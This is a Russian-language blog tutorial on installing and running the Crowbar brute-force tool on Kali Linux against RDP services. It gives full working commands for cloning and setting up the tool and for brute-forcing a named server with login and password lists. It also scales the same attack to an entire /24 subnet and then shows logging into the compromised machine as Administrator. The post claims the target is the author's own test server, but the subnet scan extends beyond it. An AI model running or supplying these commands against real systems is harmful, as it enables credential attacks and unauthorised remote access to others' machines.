Обзор скрипта для брутфорса Crowbar в KaliLinux.

Обзор скрипта для брутфорса Crowbar в KaliLinux.

Life-Hack

Вчера упрямый Patator не пожелал "прогнуться" под мои желания и Господин Случай сделал для меня маленькое открытие ))

В этом месте читателю в голову пришли мысли о том, что Илон Маск уже колонизировал Марс )

Нет, мои открытия намного скромнее. Оказалось, что для семейства Линукс написан очередной скрипт для осуществления атак "грубой силой" на Python.

Встречайте, Его Величество Crowbar.

Первоначально у меня было намерение установить скрипт на удалённую машину под управлением CentOS 7. Но меня ожидала неудача. Дело в том, что я планировала проверить работу скрипта по протоколу RDP и никакие компромиссы меня не устраивали. При работе по протоколу удалённого рабочего стола работа скрипта тесно связана с утилитой xfreerdp.

Я подключалась к VDS как обычно по протоколу SSH - в этом заключалась моя вероятная ошибка.

Для успешного контакта Crowbar+ XfreeRDP на удалённой машине необходимо было подключиться по VNC либо RDP.

Но внезапно нахлынувший ночной энтузиазм таял от минуты к минуте и было принято решение сдуть пыль с ярлыка "VMware Workstation Pro" на рабочем столе локальной машины.

На установку скачанного десять месяцев назад образа KaliLinux не ушло много времени.

По-быстрому произведены первичные настройки виртуального Kali и настал момент "танцев с бубном" вокруг Crowbar

Брут Crowbar - это скрипт на питоне , который вызывает системные программы с нужными параметрами . Для брута rdp вызывается xfreerdp клиент 

# apt-get install freerdp-x11


Проверка работоспособности xfreerdp

# xfreerdp --version
# xfreerdp --sec nla 185.154.13.84


Вышеуказанные команды вызывают адекватную реакцию, никаких ошибок в отличие от работы на удалённой CentOS 7 не выдали, значит можно продолжить.

Клонируем скрипт Crowbar при помощи git:

# git clone https://github.com/galkan/crowbar


Заходим в папку со скриптом:

# cd crowbar


Файлу надо добавить бит исполнимости (возможно, эта команда - лишняя, но я решила подстраховаться):

# chmod +x crowbar.py


Проверим работоспособность скрипта на этом этапе. Зададим ему команду выдать справку о себе.

# python crowbar.py --help


Перед моим взором на экране монитора появилась страница справки по программе.

В этом месте возможно появление следующей ошибки:

No module named pkg_resources

Решение проблемы с ошибкой No module named pkg_resources

# yum -y update
# yum -y install python-pip
# pip install --upgrade pip


Или

# pip install --upgrade setuptools
# pip install --upgrade distribute


Опять пробуем запустить "Хелп"

# python crowbar.py --help


Работает ))

На этом - ВСЁ.

Всё коротко и лаконично )

Создаём текстовые файлы с предполагаемым списком логинов,

а также со списком предполагаемых паролей.

Запуск скрипта питон в скрипте баш

Атаковать будем мой тестовый дедик IP 185.1хх.13.хх

Команда для атаки в моём случае должна иметь следующий вид:

# python crowbar.py -b rdp -U login.txt -C pass.txt  -s IP 185.1хх.13.хх/32 -o good.txt -n 100 -t 500 -v -d


Сканирование подсети 185.1хх.13.хх/24

# python crowbar.py -b rdp -U login.txt -C pass.txt  -s 185.1хх.13.хх/24 -o good.txt -n 100 -t 500 -v -d


Короткие пояснения :

-b rdp - Целевая служба. Crowbar поддерживает vnckey, openvpn, sshkey, rdp.

-n 100 - Количество задействованных потоков

-S: </path/to/file> список IP для брута

-d: Запустить nmap для того, чтобы узнать, является ли порт открытым или нет.

-v: Подробный режим, который показывает все попытки, включая неудачу.

-o good.txt -Все логи включая положительные результаты записываются в файл good.txt

После окончания атаки просматриваем файл good.txt и обнаруживает, что тестовый дедик успешно сбручен.

Подключаемся к его удалённому рабочему столу.

# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.1хх.13.хх


Успех )

В заключении статьи предлагаю к просмотру небольшой видеообзор скрипта

На этом у меня всё.Всем - спасибо ) Источник